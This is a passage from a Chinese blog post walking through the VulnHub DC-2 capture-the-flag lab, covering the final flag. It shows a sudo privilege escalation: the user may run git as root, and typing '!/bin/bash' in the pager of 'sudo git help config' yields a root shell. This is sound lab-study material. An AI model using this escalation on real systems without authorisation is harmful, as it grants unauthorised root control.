<p>Good to see that you’ve made it this far - but you’re not home yet. You still need to get the final flag (the only flag that really counts!!!). No hints here - you’re on your own now. :-) Go on - git outta here!!!! </p>
<p>flag4提示</p>
</blockquote>
<h3 id="Final-FLAG"><a href="#Final-FLAG" class="headerlink" title="Final FLAG"></a>Final FLAG</h3><p>先看一眼当前用户：<code>whoami</code></p>
<img src="https://s3.xiabee.cn/pic/2023/03/6bedca61df3ad57c6144ad34762668154a7b9fa371536ff4414126c67bb8a964.png" alt="image-20230321155933121" style="zoom:200%;" />



<p>确认过眼神，还是jerry，没有 root 从天而降…… </p>
<p>先<code>sudo -l </code>一下，看看 jerry 有哪些权限：</p>
<img src="https://s3.xiabee.cn/pic/2023/03/fb79b083e11d01bf5220ad6c03ea01f66b4a0724030bcd4d83c0bca2974a4bcd.png" alt="image-20230321160001117" style="zoom:200%;" />



<p>emmm jerry居然能以root身份去git，那没事了，开始提权 （而且flag4也暗示我们通过git提权，我们就上网找一个poc）</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sudo git <span class="built_in">help</span> config</span><br><span class="line"><span class="comment"># root权限打开git的配置，注意这里一定要sudo，不然是以普通用户身份打开git</span></span><br></pre></td></tr></table></figure>

<p><img src="https://s3.xiabee.cn/pic/2023/03/1cfc52ed386a17e7a59c48df793e3b6e9b17f878d15b8daab9c979bb8e9d1f7b.png" alt="image-20230321160051663"></p>
<p>多页分隔，绝佳的 hack 位点</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">!/bin/bash</span><br><span class="line"><span class="comment"># 直接在config里面输入命令，反弹bash</span></span><br></pre></td></tr></table></figure>

<img src="https://s3.xiabee.cn/pic/2023/03/cb0e08166d688b928b37bfef31c169ef799b4a9eb4d099aa0826d120ef92a197.png" alt="image-20230321160123058" style="zoom:200%;" />

<p>回车，然后发现我们已经有了root 的shell：</p>
<img src="https://s3.xiabee.cn/pic/2023/03/b159cc6b6ad57e4bb76e0c79f51c2431757815f4fe316281a413339defbb5acf.png" alt="image-20230321160142115" style="zoom:200%;" />

<p>此时已是root</p>
<p>然后直接去老家看flag啦：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> /root</span><br><span class="line"><span class="built_in">ls</span></span><br><span class="line"><span class="built_in">cat</span> final-flag.txt</span><br></pre></td></tr></table></figure>

<p><img src="https://s3.xiabee.cn/pic/2023/03/14fa375cb0b3f79bfd7f8a2cfcfe43585e564d8ab2fdbb08d0ee4e5b90905b58.png" alt="image-20230321160207972"></p>
<blockquote>
<p>Congratulatons!!! A special thanks to all those who sent me tweets and provided me with feedback - it’s all greatly appreciated. If you enjoyed this CTF, send me a tweet via @DCAU7. Well done！</p>
</blockquote>
<h2 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h2><p>整体来说 DC2 可能比 DC1 简单一点点，因为没有涉及 msf 的各种调试和数据库的修改 hhh </p>
<p><del>当然这也可能是我的错觉</del></p>
<p>这次主要学到了git还能这样玩</p>
<p>下次的题下次再更，我是鸽手（x）</p>

    </article>
    <!-- license -->
    
        <div class="license-wrapper">
            <p>原文作者：<a href="https://blog.xiabee.cn">xiabee</a>
            <p>原文链接：<a href="https://blog.xiabee.cn/posts/vulnhub-dc-2/">https://blog.xiabee.cn/posts/vulnhub-dc-2/</a>
            <p>发表日期：<a href="https://blog.xiabee.cn/posts/vulnhub-dc-2/">March 9th 2020, 9:00:23 pm</a>
            <p>更新日期：<a href="https://blog.xiabee.cn/posts/vulnhub-dc-2/">March 21st 2023, 4:03:14 pm</a>
            <p>版权声明：本文采用<a rel="license noopener" target="_blank" href="http://creativecommons.org/licenses/by-nc/4.0/">知识共享署名-非商业性使用 4.0 国际许可协议</a>进行许可</p>
        </div>
    
    <!-- paginator -->
    <ul class="post-paginator">
        <li class="next">
            
                <div class="nextSlogan">Next Post</div>
                <a href="/posts/ababa/" title="碎碎念">
                    <div class="nextTitle">碎碎念</div>
                </a>
            
        </li>
        <li class="previous">
            
                <div class="prevSlogan">Previous Post</div>
                <a href="/posts/vulnhub-dc-1/" title="VulnHub DC1 通关纪实">
                    <div class="prevTitle">VulnHub DC1 通关纪实</div>
                </a>
            
        </li>
    </ul>
    <!-- comment -->
    
        <div class="post-comment">
            <!-- 来必力 City 版安装代码 -->


            

            

            

            <!-- utteranc评论 -->

    <script src='https://utteranc.es/client.js'
        repo='xiabee/xiabee.github.io'
        issue-term='title'
        label='Comment'
        theme='github-light'
        crossorigin='anonymous'
        async>
    </script>


            <!-- partial('_partial/comment/changyan') -->
            <!--PC版-->


            
            

            

        </div>
    
    <!-- timeliness note -->
    <!-- idea from: https://hexo.fluid-dev.com/posts/hexo-injector/#%E6%96%87%E7%AB%A0%E6%97%B6%E6%95%88%E6%80%A7%E6%8F%90%E7%A4%BA -->
    
    <!-- Mathjax -->
    
</main>

                <!-- profile -->
                
            </div>
            <footer class="footer footer-unloaded">
    <!-- social  -->
    
        <div class="social">
            
    
        
            
                <a href="mailto:xiabee@foxmail.com" class="iconfont-archer email" title=email ></a>
            
        
    
        
            
                <a href="https://github.com/xiabee" class="iconfont-archer github" target="_blank" title=github></a>
            
        
    
        
    
        
    
        
    
        
            
                <a href="https://weibo.com/u/7390789827" class="iconfont-archer weibo" target="_blank" title=weibo></a>
            
        
    
        
            
                <a href="https://www.zhihu.com/people/xiao-53-1" class="iconfont-archer zhihu" target="_blank" title=zhihu></a>
            
        
    
        
    
        
    
        
            
                <a href="https://twitter.com/xiabeeSec" class="iconfont-archer twitter" target="_blank" title=twitter></a>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
            
                <a href="https://space.bilibili.com/43789348" class="iconfont-archer bilibili" target="_blank" title=bilibili></a>
            
        
    
        
            
                <a href="https://www.linkedin.com/in/yunjie-xiao-559502253/" class="iconfont-archer linkedin" target="_blank" title=linkedin></a>
            
        
    
        
            
                <a href="https://steamcommunity.com/id/xiabee/" class="iconfont-archer steam" target="_blank" title=steam></a>
            
        
    
        
    
        
    


        </div>
    
    <!-- powered by Hexo  -->
    <div class="copyright">
        <span id="hexo-power">Powered by <a href="https://hexo.io/" target="_blank">Hexo</a></span><span class="iconfont-archer power">&#xe635;</span><span id="theme-info">theme <a href="https://github.com/fi3ework/hexo-theme-archer" target="_blank">Archer</a></span>
    </div>
    <!-- website approve for Chinese user -->
    
    <!-- 不蒜子  -->
    
        <div class="busuanzi-container">
            
             
                <span id="busuanzi_container_site_pv">PV: <span id="busuanzi_value_site_pv"></span> :)</span>
            
        </div>
    	
</footer>

        </div>
        <!-- toc -->
        
            <div class="toc-wrapper toc-wrapper-loding" style=







    top:50vh;

>
                <div class="toc-catalog">
                    <span class="iconfont-archer catalog-icon">&#xe613;</span><span>CATALOG</span>
                </div>
                <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E6%8F%8F%E8%BF%B0"><span class="toc-number">1.</span> <span class="toc-text">题目描述</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%90%AD%E5%BB%BA%E9%9D%B6%E6%9C%BA"><span class="toc-number">2.</span> <span class="toc-text">搭建靶机</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">3.</span> <span class="toc-text">信息收集</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BF%AE%E6%94%B9%E5%9F%9F%E5%90%8D%E8%A7%A3%E6%9E%90"><span class="toc-number">4.</span> <span class="toc-text">修改域名解析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AF%BB%E6%89%BE-FLAG"><span class="toc-number">5.</span> <span class="toc-text">寻找 FLAG</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#FLAG1"><span class="toc-number">5.1.</span> <span class="toc-text">FLAG1</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#FLAG2"><span class="toc-number">5.2.</span> <span class="toc-text">FLAG2</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#FLAG3"><span class="toc-number">5.3.</span> <span class="toc-text">FLAG3</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#FLAG4"><span class="toc-number">5.4.</span> <span class="toc-text">FLAG4</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Final-FLAG"><span class="toc-number">5.5.</span> <span class="toc-text">Final FLAG</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B0%8F%E7%BB%93"><span class="toc-number">6.</span> <span class="toc-text">小结</span></a></li></ol>
            </div>
        
        <!-- sidebar -->
        <div class="sidebar sidebar-hide">
    <ul class="sidebar-tabs sidebar-tabs-active-0">
        <li class="sidebar-tab-archives"><span class="iconfont-archer">&#xe67d;</span><span class="tab-name">Archive</span></li>
        <li class="sidebar-tab-tags"><span class="iconfont-archer">&#xe61b;</span><span class="tab-name">Tag</span></li>
        <li class="sidebar-tab-categories"><span class="iconfont-archer">&#xe666;</span><span class="tab-name">Cate</span></li>
    </ul>
    <div class="sidebar-content sidebar-content-show-archive">
        <div class="sidebar-panel-archives">
    <!-- 在 ejs 中将 archive 按照时间排序 -->
    
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
    
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
    
    
    
    
    <div class="total-and-search">
        <div class="total-archive">
        Total : 53
        </div>
        <!-- search  -->
        
            <div class="site-search site-search-loading popup-trigger">
                <span class="iconfont-archer search-icon">&#xe627;</span>
            </div>
        
    </div>
    
    <div class="post-archive">
    
        
            
            
            <div class="archive-year"> 2023 </div>
            <ul class="year-list">
            
        
        <li class="archive-post-item">
            <span class="archive-post-date">06/30</span>
            <a class="archive-post-title" href="/posts/ossinsight-lite/">10 分钟内搭建自己的 Oss-Insight-lite</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">04/19</span>
            <a class="archive-post-title" href="/posts/pichost-picgo/">PicGO 连接 AWS S3</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">04/19</span>
            <a class="archive-post-title" href="/posts/app-error/">“应用程序”已损坏解决方案</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">04/09</span>
            <a class="archive-post-title" href="/posts/aws-pichost/">AWS S3+CloudFront 打造自己的图床</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">03/28</span>
            <a class="archive-post-title" href="/posts/chengkailiu/">wpaskjbdn zqnakjsnde</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">02/18</span>
            <a class="archive-post-title" href="/posts/aws-intro/">AWS 入门</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">02/16</span>
            <a class="archive-post-title" href="/posts/sina-pichost/">微博图床抢救</a>
        </li>
    
        
            
            
                
                </ul>
            
            <div class="archive-year"> 2022 </div>
            <ul class="year-list">
            
        
        <li class="archive-post-item">
            <span class="archive-post-date">12/11</span>
            <a class="archive-post-title" href="/posts/aws-lambda/">使用 AWS Lambda 进行签到</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">10/21</span>
            <a class="archive-post-title" href="/posts/wechat-bot/">利用企业微信机器人推送消息</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">10/20</span>
            <a class="archive-post-title" href="/posts/glados-intro/">Glados 签到简介</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">09/30</span>
            <a class="archive-post-title" href="/posts/mac-bp/">Mac 环境配置(4)——BurpSuite 破解</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">08/24</span>
            <a class="archive-post-title" href="/posts/mac-proxy/">Mac 环境配置(3)——配置代理</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">08/23</span>
            <a class="archive-post-title" href="/posts/mac-brew/">Mac 环境配置(2)——homebrew</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">08/16</span>
            <a class="archive-post-title" href="/posts/mac-init/">Mac 环境配置(1)——完美终端</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">08/14</span>
            <a class="archive-post-title" href="/posts/hexo-transfer-issue/">Hexo 本地迁移</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">08/08</span>
            <a class="archive-post-title" href="/posts/tidb-build-up/">Build Distributed TiDB System</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">05/21</span>
            <a class="archive-post-title" href="/posts/hydro-hepler/">Hydro-OJ 使用说明</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">05/08</span>
            <a class="archive-post-title" href="/posts/docker-compose-2/">安装 docker-compose 2</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">05/08</span>
            <a class="archive-post-title" href="/posts/postal-mailserver/">Docker 搭建 Postal 邮件系统</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">04/29</span>
            <a class="archive-post-title" href="/posts/hydro-docker/">Docker搭建Hydro-OJ系统</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">03/08</span>
            <a class="archive-post-title" href="/posts/2022-spring-recruitment/">2022春招安全岗记录</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">02/03</span>
            <a class="archive-post-title" href="/posts/vps-toss/">服务器的折腾</a>
        </li>
    
        
            
            
                
                </ul>
            
            <div class="archive-year"> 2021 </div>
            <ul class="year-list">
            
        
        <li class="archive-post-item">
            <span class="archive-post-date">12/25</span>
            <a class="archive-post-title" href="/posts/diary/">考研日记</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">11/11</span>
            <a class="archive-post-title" href="/posts/11-11/">如何在双十一快速脱单？</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">11/09</span>
            <a class="archive-post-title" href="/posts/nextcloud-docker/">Docker搭建NextCloud个人网盘</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">11/09</span>
            <a class="archive-post-title" href="/posts/wordpress-docker/">Docker搭建Wordpress个人博客</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">11/07</span>
            <a class="archive-post-title" href="/posts/markdown-docker/">Docker搭建Markdown共享编辑器</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">11/03</span>
            <a class="archive-post-title" href="/posts/utteranc-hexo/">utteranc 搭建评论系统</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">11/02</span>
            <a class="archive-post-title" href="/posts/git-coding-hexo/">Git Page + Coding Page 实现负载均衡</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">10/31</span>
            <a class="archive-post-title" href="/posts/archer-algolia/">Archer主题启用Algolia全文搜索</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">10/31</span>
            <a class="archive-post-title" href="/posts/hexo-archer/">Hexo更换主题</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">10/28</span>
            <a class="archive-post-title" href="/posts/hexo-git-backup/">利用git分支进行Hexo备份</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">10/27</span>
            <a class="archive-post-title" href="/posts/hexo-git-setup/">Hexo+GitPage搭建个人博客</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">10/01</span>
            <a class="archive-post-title" href="/posts/fri/">FRIENDS</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">08/30</span>
            <a class="archive-post-title" href="/posts/blockchain-truffle/">三天速成智能合约–DAY3：truffle 从放手到放弃</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">08/29</span>
            <a class="archive-post-title" href="/posts/blockchain-geth/">三天速成智能合约–DAY2：GETH 从入门到入土</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">08/28</span>
            <a class="archive-post-title" href="/posts/blockchain-start/">三天速成智能合约–DAY1：环境安装</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">07/15</span>
            <a class="archive-post-title" href="/posts/2021-summer-year3/">我的大三</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">03/10</span>
            <a class="archive-post-title" href="/posts/shodan-cam/">Shodan + MSF 入侵智能摄像头</a>
        </li>
    
        
            
            
                
                </ul>
            
            <div class="archive-year"> 2020 </div>
            <ul class="year-list">
            
        
        <li class="archive-post-item">
            <span class="archive-post-date">11/07</span>
            <a class="archive-post-title" href="/posts/occupation-ctf-wp/">职业杯 2020 选拔赛回顾 & Write UP</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">10/26</span>
            <a class="archive-post-title" href="/posts/wsl2-about/">WSL2踩坑分享</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">09/14</span>
            <a class="archive-post-title" href="/posts/linux-gmp/">Linux安装GMP依赖</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">09/05</span>
            <a class="archive-post-title" href="/posts/2020-summer/">2020 Summer Review of xiabee</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">08/27</span>
            <a class="archive-post-title" href="/posts/github-ssh/">GitHub配置SSH Key</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">04/18</span>
            <a class="archive-post-title" href="/posts/wechat-0day/">微信RCE 0day复现</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">03/19</span>
            <a class="archive-post-title" href="/posts/docker-sudo/">不输入sudo运行Docker</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">03/18</span>
            <a class="archive-post-title" href="/posts/docker-commands/">Docker常用命令</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">03/17</span>
            <a class="archive-post-title" href="/posts/docker-source/">Docker换源</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">03/17</span>
            <a class="archive-post-title" href="/posts/docker-pupy/">Docker入门</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">03/14</span>
            <a class="archive-post-title" href="/posts/linux-sources/">Ubuntu/kali 国内各大更新源</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">03/10</span>
            <a class="archive-post-title" href="/posts/ababa/">碎碎念</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">03/09</span>
            <a class="archive-post-title" href="/posts/vulnhub-dc-2/">VulnHub DC2 通关纪实</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">03/09</span>
            <a class="archive-post-title" href="/posts/vulnhub-dc-1/">VulnHub DC1 通关纪实</a>
        </li>
    
    </div>
</div>

        <div class="sidebar-panel-tags">
    <div class="sidebar-tags-name">
        
            <span class="sidebar-tag-name" data-tags="tidb">
                <span class="iconfont-archer">&#xe606;</span>
                tidb
            </span>
        
            <span class="sidebar-tag-name" data-tags="linux">
                <span class="iconfont-archer">&#xe606;</span>
                linux
            </span>
        
            <span class="sidebar-tag-name" data-tags="hexo">
                <span class="iconfont-archer">&#xe606;</span>
                hexo
            </span>
        
            <span class="sidebar-tag-name" data-tags="archer">
                <span class="iconfont-archer">&#xe606;</span>
                archer
            </span>
        
            <span class="sidebar-tag-name" data-tags="algolia">
                <span class="iconfont-archer">&#xe606;</span>
                algolia
            </span>
        
            <span class="sidebar-tag-name" data-tags="git">
                <span class="iconfont-archer">&#xe606;</span>
                git
            </span>
        
            <span class="sidebar-tag-name" data-tags="ssh">
                <span class="iconfont-archer">&#xe606;</span>
                ssh
            </span>
        
            <span class="sidebar-tag-name" data-tags="oj">
                <span class="iconfont-archer">&#xe606;</span>
                oj
            </span>
        
            <span class="sidebar-tag-name" data-tags="docker">
                <span class="iconfont-archer">&#xe606;</span>
                docker
            </span>
        
            <span class="sidebar-tag-name" data-tags="wsl">
                <span class="iconfont-archer">&#xe606;</span>
                wsl
            </span>
        
            <span class="sidebar-tag-name" data-tags="nextcloud">
                <span class="iconfont-archer">&#xe606;</span>
                nextcloud
            </span>
        
            <span class="sidebar-tag-name" data-tags="mac">
                <span class="iconfont-archer">&#xe606;</span>
                mac
            </span>
        
            <span class="sidebar-tag-name" data-tags="brew">
                <span class="iconfont-archer">&#xe606;</span>
                brew
            </span>
        
            <span class="sidebar-tag-name" data-tags="wordpress">
                <span class="iconfont-archer">&#xe606;</span>
                wordpress
            </span>
        
            <span class="sidebar-tag-name" data-tags="markdown">
                <span class="iconfont-archer">&#xe606;</span>
                markdown
            </span>
        
            <span class="sidebar-tag-name" data-tags="utteranc">
                <span class="iconfont-archer">&#xe606;</span>
                utteranc
            </span>
        
            <span class="sidebar-tag-name" data-tags="postal">
                <span class="iconfont-archer">&#xe606;</span>
                postal
            </span>
        
            <span class="sidebar-tag-name" data-tags="vps">
                <span class="iconfont-archer">&#xe606;</span>
                vps
            </span>
        
            <span class="sidebar-tag-name" data-tags="ctf">
                <span class="iconfont-archer">&#xe606;</span>
                ctf
            </span>
        
            <span class="sidebar-tag-name" data-tags="碎碎念">
                <span class="iconfont-archer">&#xe606;</span>
                碎碎念
            </span>
        
            <span class="sidebar-tag-name" data-tags="friends">
                <span class="iconfont-archer">&#xe606;</span>
                friends
            </span>
        
            <span class="sidebar-tag-name" data-tags="0day">
                <span class="iconfont-archer">&#xe606;</span>
                0day
            </span>
        
            <span class="sidebar-tag-name" data-tags="docker-compose">
                <span class="iconfont-archer">&#xe606;</span>
                docker-compose
            </span>
        
            <span class="sidebar-tag-name" data-tags="blockchain">
                <span class="iconfont-archer">&#xe606;</span>
                blockchain
            </span>
        
            <span class="sidebar-tag-name" data-tags="smart contract">
                <span class="iconfont-archer">&#xe606;</span>
                smart contract
            </span>
        
            <span class="sidebar-tag-name" data-tags="glados">
                <span class="iconfont-archer">&#xe606;</span>
                glados
            </span>
        
            <span class="sidebar-tag-name" data-tags="serverless">
                <span class="iconfont-archer">&#xe606;</span>
                serverless
            </span>
        
            <span class="sidebar-tag-name" data-tags="aws">
                <span class="iconfont-archer">&#xe606;</span>
                aws
            </span>
        
            <span class="sidebar-tag-name" data-tags="vulnhub">
                <span class="iconfont-archer">&#xe606;</span>
                vulnhub
            </span>
        
            <span class="sidebar-tag-name" data-tags="wpaskjbdn">
                <span class="iconfont-archer">&#xe606;</span>
                wpaskjbdn
            </span>
        
            <span class="sidebar-tag-name" data-tags="zqnakjsnde">
                <span class="iconfont-archer">&#xe606;</span>
                zqnakjsnde
            </span>
        
            <span class="sidebar-tag-name" data-tags="s3">
                <span class="iconfont-archer">&#xe606;</span>
                s3
            </span>
        
            <span class="sidebar-tag-name" data-tags="cloud">
                <span class="iconfont-archer">&#xe606;</span>
                cloud
            </span>
        
    </div>
    <div class="iconfont-archer sidebar-tags-empty">&#xe678;</div>
    <div class="tag-load-fail" style="display: none; color: #ccc; font-size: 0.6rem;">
        缺失模块，请参考主题文档进行安装配置：https://github.com/fi3ework/hexo-theme-archer#%E5%AE%89%E8%A3%85%E4%B8%BB%E9%A2%98
    </div> 
    <div class="sidebar-tags-list"></div>
</div>

        <div class="sidebar-panel-categories">
    <div class="sidebar-categories-name">
    
        <span class="sidebar-category-name" data-categories="coding">
            <span class="iconfont-archer">&#xe60a;</span>
            coding
        </span>
    
        <span class="sidebar-category-name" data-categories="informal essay">
            <span class="iconfont-archer">&#xe60a;</span>
            informal essay
        </span>
    
        <span class="sidebar-category-name" data-categories="friends">
            <span class="iconfont-archer">&#xe60a;</span>
            friends
        </span>
    
        <span class="sidebar-category-name" data-categories="ctf">
            <span class="iconfont-archer">&#xe60a;</span>
            ctf
        </span>
    
        <span class="sidebar-category-name" data-categories="blockchain">
            <span class="iconfont-archer">&#xe60a;</span>
            blockchain
        </span>
    
        <span class="sidebar-category-name" data-categories="aws">
            <span class="iconfont-archer">&#xe60a;</span>
            aws
        </span>
    
        <span class="sidebar-category-name" data-categories="cloud">
            <span class="iconfont-archer">&#xe60a;</span>
            cloud
        </span>
    
    </div>
    <div class="iconfont-archer sidebar-categories-empty">&#xe678;</div>
    <div class="sidebar-categories-list"></div>
</div>

    </div>
</div>

        <!-- site-meta -->
        <script>
    var siteMetaRoot = "/"
    if (siteMetaRoot === "undefined") {
        siteMetaRoot = '/'
    }
    var siteMeta = {
        url: "https://blog.xiabee.cn",
        root: siteMetaRoot,
        author: "xiabee"
    }
</script>

        <!-- import experimental options here -->
        <!-- Custom Font -->


        <!-- main func -->
        <script src="/scripts/main.js?v=20210823"></script>
        <!-- dark mode -->
        <script src="/scripts/dark.js?v=20210823"></script>
        <!-- fancybox -->
        <script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" defer></script>
        <!-- algolia -->
        
            <div class="site-search site-search-loading">
    <div class="algolia-popup popup">
        <div class="algolia-search">
            <div class="algolia-search-input-icon">
                <i class="fa fa-search"></i>
            </div>
            <div class="algolia-search-input" id="algolia-search-input"></div>
            <div class="popup-btn-close">
                <i class="iconfont-archer">&#xe609;</i>
            </div>
        </div>

        <div class="algolia-results">
            <div id="algolia-stats" class="algolia-stats"></div>
            <div id="algolia-hits"></div>
            <div id="algolia-pagination" class="algolia-pagination"></div>
        </div>
    </div>
</div>

            <script src="/scripts/search.js?v=20210823" defer></script>
        
        <!-- busuanzi -->
        
            <script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script>
        
        <!-- CNZZ -->
        
        <!-- async load share.js -->
        
            <script src="/scripts/share.js?v=20210823" async></script>
        
        <!-- mermaid -->
        
    </body>
</html>
